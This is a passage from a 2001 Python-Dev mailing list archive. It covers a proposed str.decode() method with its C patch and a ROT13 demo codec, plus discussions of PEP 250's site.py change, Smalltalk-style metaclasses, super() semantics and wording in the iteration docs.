> the .decode() method would just expose it.

Show me the patch and I'll decide whether it's code bloat. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Wed May  2 20:20:24 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 20:20:24 +0200
Subject: [Python-Dev] PEP 250 buglet
Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid>

PEP 250 suggests changing the sitedirs setup in site.py from

    sitedirs = [prefix]

to

    sitedirs == [makepath(prefix, "lib", "site-packages")]

on windows. it then goes on to say that

    This change does not preclude packages using the current
    location -- the change only adds a directory to sys.path, it
    does not remove anything.

this isn't true (even after correcting the typo), since the
sitedirs list isn't only added to the path; it's also used to
look for PTH files.  after this change, PTH files located under
prefix will no longer be found.

the following change works a bit better:

    sitedirs = [prefix, makepath(prefix, "lib", "site-packages")]

Cheers /F


From mal at lemburg.com  Wed May  2 21:55:25 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 21:55:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
Message-ID: <3AF0662D.48671B4E@lemburg.com>

Guido van Rossum wrote:
> 
> > > Can you provide examples of where this can't be done using the
> > > existing approach?
> >
> > There is no existing elegant approach except hooking up to the
> > codecs directly. Adding .decode() is really a matter of adding
> > symmetry.
> 
> Yes, but symmetry is good except when it isn't. :-)
> 
> > Here are some example of how these two codec methods could
> > be used:
> >
> >       xmltext = binarydata.encode('base64')
> >       ...
> >       binarydata = xmltext.decode('base64')
> >
> >       zzz = data.encode('gzip')
> >       ...
> >       data = zzz.decode('gzip')
> >
> >       jpegimage = gifimage.decode('gif').encode('jpeg')
> >
> >       mp3audio = wavaudio.decode('wav').encode('mp3')
> >
> >       etc.
> 
> How would you do this currently?

By looking up the codecs using the codec registry and
then calling them directly.
 
> > Basically all content transfer encodings can take advantage of
> > these two methods.
> >
> > It's not really code bloat, BTW, since the C API is there;
> > the .decode() method would just expose it.
> 
> Show me the patch and I'll decide whether it's code bloat. :-)

I've attached the patch. Due to a small reorganisation the
patch is a little longer -- symmetry has its price at C level
too ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
-------------- next part --------------
--- CVS-Python/Include/stringobject.h	Sat Feb 24 10:30:49 2001
+++ Dev-Python/Include/stringobject.h	Wed May  2 21:05:12 2001
@@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE
     PyObject *str,	 	/* string object */
     const char *encoding,	/* encoding */
     const char *errors		/* error handling */
     );
 
+/* Decodes a string object and returns the result as Python string
+   object. */
+
+extern DL_IMPORT(PyObject*) PyString_AsDecodedString(
+    PyObject *str,	 	/* string object */
+    const char *encoding,	/* encoding */
+    const char *errors		/* error handling */
+    );
+
 /* Provides access to the internal data buffer and size of a string
    object or the default encoded version of an Unicode object. Passing
    NULL as *len parameter will force the string buffer to be
    0-terminated (passing a string with embedded NULL characters will
    cause an exception).  */
--- CVS-Python/Objects/stringobject.c	Wed May  2 16:19:22 2001
+++ Dev-Python/Objects/stringobject.c	Wed May  2 21:04:34 2001
@@ -138,42 +138,56 @@ PyString_FromString(const char *str)
 PyObject *PyString_Decode(const char *s,
 			  int size,
 			  const char *encoding,
 			  const char *errors)
 {
-    PyObject *buffer = NULL, *str;
+    PyObject *v, *str;
+
+    str = PyString_FromStringAndSize(s, size);
+    if (str == NULL)
+	return NULL;
+    v = PyString_AsDecodedString(str, encoding, errors);
+    Py_DECREF(str);
+    return v;
+}
+
+PyObject *PyString_AsDecodedString(PyObject *str,
+				   const char *encoding,
+				   const char *errors)
+{
+    PyObject *v;
+
+    if (!PyString_Check(str)) {
+        PyErr_BadArgument();
+        goto onError;
+    }
 
     if (encoding == NULL)
 	encoding = PyUnicode_GetDefaultEncoding();
 
     /* Decode via the codec registry */
-    buffer = PyBuffer_FromMemory((void *)s, size);
-    if (buffer == NULL)
-        goto onError;
-    str = PyCodec_Decode(buffer, encoding, errors);
-    if (str == NULL)
+    v = PyCodec_Decode(str, encoding, errors);
+    if (v == NULL)
         goto onError;
     /* Convert Unicode to a string using the default encoding */
-    if (PyUnicode_Check(str)) {
-	PyObject *temp = str;
-	str = PyUnicode_AsEncodedString(str, NULL, NULL);
+    if (PyUnicode_Check(v)) {
+	PyObject *temp = v;
+	v = PyUnicode_AsEncodedString(v, NULL, NULL);
 	Py_DECREF(temp);
-	if (str == NULL)
+	if (v == NULL)
 	    goto onError;
     }
-    if (!PyString_Check(str)) {
+    if (!PyString_Check(v)) {
         PyErr_Format(PyExc_TypeError,
                      "decoder did not return a string object (type=%.400s)",
-                     str->ob_type->tp_name);
-        Py_DECREF(str);
+                     v->ob_type->tp_name);
+        Py_DECREF(v);
         goto onError;
     }
-    Py_DECREF(buffer);
-    return str;
+    return v;
 
  onError:
-    Py_XDECREF(buffer);
     return NULL;
 }
 
 PyObject *PyString_Encode(const char *s,
 			  int size,
@@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb
         return NULL;
     return PyString_AsEncodedString((PyObject *)self, encoding, errors);
 }
 
 
+static char decode__doc__[] =
+"S.decode([encoding[,errors]]) -> string\n\
+\n\
+Return a decoded string version of S. Default encoding is the current\n\
+default string encoding. errors may be given to set a different error\n\
+handling scheme. Default is 'strict' meaning that encoding errors raise\n\
+a ValueError. Other possible values are 'ignore' and 'replace'.";
+
+static PyObject *
+string_decode(PyStringObject *self, PyObject *args)
+{
+    char *encoding = NULL;
+    char *errors = NULL;
+    if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors))
+        return NULL;
+    return PyString_AsDecodedString((PyObject *)self, encoding, errors);
+}
+
+
 static char expandtabs__doc__[] =
 "S.expandtabs([tabsize]) -> string\n\
 \n\
 Return a copy of S where all tab characters are expanded using spaces.\n\
 If tabsize is not given, a tab size of 8 characters is assumed.";
@@ -2347,10 +2373,11 @@ string_methods[] = {
 	{"title",       (PyCFunction)string_title,       1, title__doc__},
 	{"ljust",       (PyCFunction)string_ljust,       1, ljust__doc__},
 	{"rjust",       (PyCFunction)string_rjust,       1, rjust__doc__},
 	{"center",      (PyCFunction)string_center,      1, center__doc__},
 	{"encode",      (PyCFunction)string_encode,      1, encode__doc__},
+	{"decode",      (PyCFunction)string_decode,      1, decode__doc__},
 	{"expandtabs",  (PyCFunction)string_expandtabs,  1, expandtabs__doc__},
 	{"splitlines",  (PyCFunction)string_splitlines,  1, splitlines__doc__},
 #if 0
 	{"zfill",       (PyCFunction)string_zfill,       1, zfill__doc__},
 #endif

From mal at lemburg.com  Wed May  2 22:36:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 22:36:30 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
		            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <3AF06FCE.854D4DF7@lemburg.com>

Here's a little fun codec to play with. It encodes the input
using the ROT13 encoding (which is 1-1 and idempotent). The
main difference over the existing codecs is that it returns
a string rather than Unicode.

To install it, simply place it in some directory on your Python 
path.

Here's some sample output (Netscape can unscramble this BTW):

"""
Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg
hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vqrzcbgrag). Gur
znva qvssrerapr bire gur rkvfgvat pbqrpf vf gung vg ergheaf
n fgevat engure guna Havpbqr.

Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba 
cngu.
"""

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: rot_13.py
Type: text/python
Size: 2066 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010502/9cbfa6dd/attachment-0001.bin>

From guido at digicool.com  Thu May  3 00:11:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 17:11:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200."
             <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> 
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>  
            <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> 
Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>

> [From Jim Althoff]
> > In the list below, indentation indicates class hieararchy (superclass --
> > subclass)
> The indentation, unfortunately, seems to be destroyed.
[...]
> A question for Jim (this is more Smalltalk than Python related):
> How does the Behaviour class fit into this picture?

Jim responded with a much clearer diagram, and as a bonus an answer to
your question about Behaviour!

> Hi Guido,
> 
> Sorry about the mangled diagram.  It's kind of tricky doing this with just
> text.  :-)    Anyway, below is a -- hopefully -- improved diagram and
> description.
> 
> At the very bottom is an answer to the question about "Behavior".
> 
> Jim
> 
> ==========================================
> 
> Smalltalk-80 (simplified) class/metaclass structure:
> 
> Terminology:
> o A "class" is an object that can be instantiated.
> o A "metaclass" is a class and is one such that when _it_ is instantiated
> _that_ instance is _itself_ a class (which can be instantiated).
> (A metaclass is a specialization of class).
> 
> Essentially,  there are two parallel hierarchies: 1) the class hierarchy
> and 2) the metaclass hierarchy.  The class hierarchy starts with class
> Object.  The metaclass hierarchy starts right below Class with the
> metaclass ObjectMetaClass.
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
> 
> Object is the top of the class hierarchy (and total hierarchy).  It has no
> superclass.  It is the only class that has no superclass.
> Class is a subclass of Object.
> MetaClass is a subclass of Class.
> 
> ObjectMetaClass is also a subclass of Class.
> ClassMetaClass is a subclass of ObjectMetaClass.
> MetaClassMetaClass is a subclass of ClassMetaClass.
> 
> Adding in application classes Rectangle and SpamRectangle then might look
> like:
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
>             o RectangleMetaClass
>                 o SpamRectangleMetaClass
>     o Rectangle
>         o SpamRectangle
> 
> Rectangle is a subclass of Object.
> SpamRectangle is a subclass of Rectangle.
> 
> RectangleMetaClass is a subclass of ObjectMetaClass.
> SpamRectangleMetaClass is a subclass of RectangleMetaClass.
> 
> Rectangle is an instance of RectangleMetaClass.
> SpamRectangle is an instance of SpamRectangleMetaClass.
> (SpamRectangleMetaClass is an instance of MetaClass.)
> 
> The next list shows both the subclass- and the instanceOf- relationships
> between classes and metaclasses.
> 
> In this list a class listed below another class is a subclass of it.
> SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam --
> the class of which class Spam is an instance).
> 
> <none>                Class
> Object    instanceOf  ObjectMC    instanceOf  MetaClass
> Class     instanceOf  ClassMC     instanceOf  MetaClass
> MetaClass instanceOf  MetaClassMC instanceOf  MetaClass
> 
> ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances
> of MetaClass.
> 
> MetaClass is an instance of MetaClassMetaClass  But MetaClassMetaClass is
> an instance of MetaClass.  So this particular relationship is circular.
> (In Smalltalk-76, Class was an instance of itself.)
> 
> Application classes would have a similar, parallel hierarchy between
> classes and their associated metaclasses.  For example:
> 
> Object        instanceOf ObjectMC        instanceOf MetaClass
> Rectangle     instanceOf RectangleMC     instanceOf MetaClass
> SpamRectangle instanceOf SpamRectangleMC instanceOf MetaClass
> 
> When you create class SpamRectangle as a subclass of class Rectangle, the
> code in the class-creation method first creates the metaclass
> SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of
> RectangleMetaClass.  The code then creates the SpamRectangle class as an
> instance of the SpamRectangleMetaClass metaclass it just created.
> 
> You can then create instances of class SpamRectangle.
> 
> SpamRectangle "instance methods" reside in the method dict of
> SpamRectangle.
> SpamRectangle "class methods" reside in the method dict of
> SpamRectangleMetaClass.
> 
> ============================
> 
> Regarding Thomas' question:
> 
> The Smalltalk-80 class hierarchy actually has a bit more factoring than
> what I show above.  In particular, Class and MetaClass are subclasses of
> the class ClassDescription.  ClassDescription is a subclass of class
> Behavior.  Behavior is a subclass of Object.
> 
> So it looks like:
> 
> <none>
> o Object
>     o Behavior
>         o ClassDescription
>             o MetaClass
>             o Class
>                 o ObjectMetaClass
>                     o BehaviorMetaClass
>                         o ClassDescriptionMetaClass
>                             o MetaClassMetaClass
>                             o ClassMetaClass
> 
> Class Behavior basically abstracts the creation and handling of method
> dict.s.  Class ClassDescription factors out common, reusable code between
> MetaClass and Class.  Clearly there are a number of ways of designing (or
> over-designing <wink> ) this part of the hierarchy.  The key idea, though,
> was to use the subclassing mechanism as a way of supportig specialized
> class methods.
> 
> =============================

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Wed May  2 23:24:28 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 2 May 2001 17:24:28 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77
In-Reply-To: <E14v35l-0007pQ-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKJPAA.tim.one@home.com>

[Fred L. Drake]
> Update the filter() and list() descriptions to include information
> about the support for containers and iteration.
> ...
>   \begin{funcdesc}{list}{sequence}
> !   Return a list whose items are the same and in the same order as
> !   \var{sequence}'s items.  \var{sequence} may be either a sequence,
> !   a container that supports iteration, or an iterator object.
> ...

[and similarly for filter()]

Before we repeat this last incantation umpteen more times in the docs, is
this how we want it to read in the end?  The truth of the implementation and
of the design is that "sequence" is any object that supports iteration,
period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they
raise TypeError).  "A sequence" and "an iterator object" *always* support
iteration, so naming them too appears to draw a distinction that doesn't
exist.

Suggested alternative:

    \var{sequence} must support iteration (see XXX).

where XXX is common boilerplate explaining what "support iteration" means,
and that sequences and iterator objects are just particular cases of that.
Note that this boilerplate may expand to include generators too before 2.2 is
real, and a generator isn't really "a container that supports iteration" (the
word "container" is a strain in the generator context).  That is, a
long-winded incantation is just going to get longer over time, and if it's
repeated umpteen places in the docs I doubt they'll all get updated when
needed.


From michel at digicool.com  Wed May  2 23:43:42 2001
From: michel at digicool.com (Michel Pelletier)
Date: Wed, 2 May 2001 14:43:42 -0700 (PDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>


On Wed, 2 May 2001, Guido van Rossum wrote:

> > <none>
> > o Object
> >     o Class
> >         o MetaClass
> >         o ObjectMetaClass
> >             o ClassMetaClass
> >                 o MetaClassMetaClass
> >
> > Object is the top of the class hierarchy (and total hierarchy).  It has no
> > superclass.  It is the only class that has no superclass.
> > Class is a subclass of Object.
> > MetaClass is a subclass of Class.
> >
> > ObjectMetaClass is also a subclass of Class.
> > ClassMetaClass is a subclass of ObjectMetaClass.
> > MetaClassMetaClass is a subclass of ClassMetaClass.

Does this go on ad infinitum?  ie, is there a ClassMetaClassMetaClass
which sublcasses MetaClassMetaClass and so on?  I was under the impression
from talking to JimF that Smalltalk eventually stopped at a class
that is a subclass of itself.

-Michel


From greg at cosc.canterbury.ac.nz  Thu May  3 03:35:29 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 13:35:29 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that DictType.__repr__ could mean either
the unbound method for finding the repr of a dictionary,
or the bound method for finding the repr of DictType
itself.

This ambiguity is inherent in the Python language as soon
as you try to make classes into instances (which you have
to do as a consequence of making types into classes).

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:15:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:15:41 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>
Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz>

Michel Pelletier <michel at digicool.com>:

> I was under the impression
> from talking to JimF that Smalltalk eventually stopped at a class
> that is a subclass of itself.

Some years ago, while playing with Sun's Postscript-based
NeWS window system, I devised an OO language (called P) that 
got translated into PostScript. It had a very Smalltalk-like
class/metaclass system, although rather simpler than what
JimF described. As I remember, the kernel consisted
of a little knot of about 6 classes with some interesting
incestuous relationships between them.

If anyone's interested, I could dig out the code and
provide details of how it all worked. There might be some
ideas that could be used in Python.

(Programming in P felt a lot like programming in Python,
by the way. If my name had been Guido, who knows where it
might have led!)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:25:12 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:25:12 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFF710.9471.8025D7EA@localhost>
Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz>

Gordon McMillan <gmcm at hypernet.com>:

> I would like to see ... some discussion of the expected 
> pragmatic benefits. (That's a different topic from subclassing 
> types.)

Actually, it's not -- the two issues are connected.

Suppose we succeed in unifying types and classes. Then
instead of classes being of type ClassType, they are
now instances of ClassClass. So classes are also
instances, or in other words, we have unified classes
and instances.

So even if we don't go as far as adding Smalltalk-style
class-methods-via-metaclasses, we still have to deal
with the fact that some things will be both classes
and instances.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:27:34 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:27:34 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz>

Guido:

> Actually, I think that what's in the __dict__ is just perfect

I was thinking of backwards compatibility for people who
are hacking the __dict__ of a class directly.

If you don't care about that, the problem is simpler.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:39:08 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:39:08 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz>

Guido:

> Will we need to add a "::" operator to Python???

If so, I hope we can find a syntax that doesn't remind
one of C++ so much...

I have an idea! 

How about spelling super(self, MyBaseClass) as

   MyBaseClass[self]

This can be thought of as a sort of "cast" which turns self
into an object which behaves like it were an instance of
MyBaseClass. Then we can write

   MyBaseClass[self].foo(args)

Advantages:
* Concise and uncluttered
* No new syntax needed
* Can be implemented using existing mechanisms
* Doesn't even remotely resemble anything in C++ :-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one at home.com  Thu May  3 07:49:04 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 3 May 2001 01:49:04 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF01381.592AE31B@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>

[MAL, on basemethods]
> ...
> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrance calling the bsaemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?

Sorry, I'm not sure what either of you is talking about.  In

class A(B, C):
    def foo(self):
        super.foo()

Guido said that super would start searching at B, but I don't know what your
"continue the search for the method as if it hadn't found the occurrance
calling the bsaemethod() API" means:  defining what a thing does in terms of
an unspecified API it doesn't use is a pretty sure recipe for compounded
confusion <wink>.

Given that we're using Python's search rules, the ambiguous point remaining
is whether:

    super.f()

textually contained in a method of class K begins searching with:

    1) K.__bases__

or with:

    2) self.__class__.__bases__

Java uses #1, and Guido's "the search starts with B" implies that he would
too.  But it's unclear whether he meant that.  Given also

class D(A):
    def foo(self):
        super.foo()

D().foo()

both views agree that D.foo() is invoked first, and that D.foo() invokes
A.foo() next.  But under #1 A.foo() invokes C.foo() or D.foo() next, while
under #2 A.foo() invokes A.foo() again.  Multiple inheritance is a red
herring here -- take C out of A's bases, and the same ambiguity needs to be
resolved.


From greg at cosc.canterbury.ac.nz  Thu May  3 07:56:07 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 17:56:07 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz>

Tim:

> Java uses #1, and Guido's "the search starts with B" implies that he would
> too.  But it's unclear whether he meant that.

It's the only sane thing for him to mean, as far as I can see.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From pf at artcom-gmbh.de  Thu May  3 08:29:03 2001
From: pf at artcom-gmbh.de (Peter Funk)
Date: Thu, 3 May 2001 08:29:03 +0200 (MEST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001  3:39: 8 pm"
Message-ID: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>

Hi,

Greg Ewing:
[...]
> How about spelling super(self, MyBaseClass) as
> 
>    MyBaseClass[self]
> 
> This can be thought of as a sort of "cast" which turns self
> into an object which behaves like it were an instance of
> MyBaseClass. Then we can write
> 
>    MyBaseClass[self].foo(args)
> 
> Advantages:
> * Concise and uncluttered
> * No new syntax needed
> * Can be implemented using existing mechanisms
> * Doesn't even remotely resemble anything in C++ :-)

Disadvantages:
* People will confuse this with calling MyBaseClass.__getitem__(....)
* Doesn't even remotely resemble anything in C++

We have to face it:  I myself don't like C++ either, but a *lot*
of people today are already familar with C++ today.  Giving them
something they are already familar with, will make it easier to
convert some of them to Python.

To Greg: This '::' operator is not at all that ugly and AFAI can see
would not introduce any backward incompatible change to the language.
I'm sure C++ has some other real warts to offer that we both don't
want to see in a future version of Python.  Right?

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From mal at lemburg.com  Thu May  3 09:49:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 09:49:37 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF10D91.802C8555@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > I'm not sure I can follow you here: DictType.__repr__ is the
> > representation method of the dictionary and not inherited
> > from TypeType, so there should be no problem.
> 
> The problem is that DictType.__repr__ could mean either
> the unbound method for finding the repr of a dictionary,
> or the bound method for finding the repr of DictType
> itself.
> 
> This ambiguity is inherent in the Python language as soon
> as you try to make classes into instances (which you have
> to do as a consequence of making types into classes).

We are actually trying to turn classes into types here :-)

Really, I think that we could resolve this issue by not inheriting
from meta-classes. DictType is a creation of the meta-class
TypeType. I'm not calling these instances to prevent additional
confusion. The root of the problem is that for some reason there
is belief that DictType should implicitly inherit attributes and 
methods from TypeType. If we simply say that there is no implicit
inheritance (only explicit one), then these problems should go
away.

Some of these ideas are burried in the "super" part of this 
thread. Unfortunately this concept doesn't go very far since
Python has multiple inheritance and thus the term "super"
(referring to the class' single base class) is not well-defined.

As Jim mentioned in his reply to Thomas' question, SmallTalk
has two parallel hierarchies. One for the classes and one for
the meta-classes. If we follow the same path in Python and
keep the two well separated, I think we can resolve many of
the issues which are currently showing up.

To link the two hierarchies together we don't need a "super"
concept, but instead a way to reach the meta-class in charge
of a class, say "klass.__creator__". 

Note that there's another issue hiding in all this and again
this is due to multiple inheritance: which meta-class is in
charge of a class which is derived from two classes having
different meta-classes ?

meta1            -->         o klass1
                               o klass1a
                               o klass1b
meta2            -->         o klass2
                               o klass2a
                               o klass2b

class klass3(klass1a, klass2b):
      ...                  

I think there's no clean way to resolve this, so I'd suggest
to simply rule this out and declare it illegal (class can
only be based on classes having the same meta-class).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry at digicool.com  Thu May  3 10:24:16 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 3 May 2001 04:24:16 -0400
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com>
	<200105021918.OAA03080@cj20424-a.reston1.va.home.com>
	<3AF052CE.E928BDA1@lemburg.com>
	<200105021938.OAA03550@cj20424-a.reston1.va.home.com>
	<3AF0662D.48671B4E@lemburg.com>
	<3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <15089.5552.164307.344721@anthem.wooz.org>

>>>>> "M" == M  <mal at lemburg.com> writes:

    M> Here's a little fun codec to play with. It encodes the input
    M> using the ROT13 encoding (which is 1-1 and idempotent).

LOL!  Guess what `language' I chose to use when testing Mailman's i18n
support?  :)

-Barry


From fredrik at pythonware.com  Thu May  3 10:11:10 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Thu, 3 May 2001 10:11:10 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid>

mal wrote:
 
> Here's some sample output (Netscape can unscramble this BTW):

heh.  just discovered that outlook express can deal with this
too -- but only if the message comes from the usenet.

on ordinary mail, the "unscramble rot13" menu entry is disabled
(too much usability testing?)

maybe you could repost your secret message to comp.lang.python ;-)

Cheers /F


From mal at lemburg.com  Thu May  3 11:05:41 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 11:05:41 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid>
Message-ID: <3AF11F65.5CBF508C@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Here's some sample output (Netscape can unscramble this BTW):
> 
> heh.  just discovered that outlook express can deal with this
> too -- but only if the message comes from the usenet.
> 
> on ordinary mail, the "unscramble rot13" menu entry is disabled
> (too much usability testing?)
> 
> maybe you could repost your secret message to comp.lang.python ;-)

It wasn't all that secret: I simply cut&pasted the first
two paragraphs of the message through the codec.

There was also an inaccuracy in the posting: the codec still
produces Unicode (by virtue of using the charmap codec as
basis). 

Still, it serves as nice example of what str.decode()
and str.encode() can be used for and also demonstrates how
easy it is to install new codecs.

I think I'll repost it to c.l.p though -- with a new secret 
attached to it ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


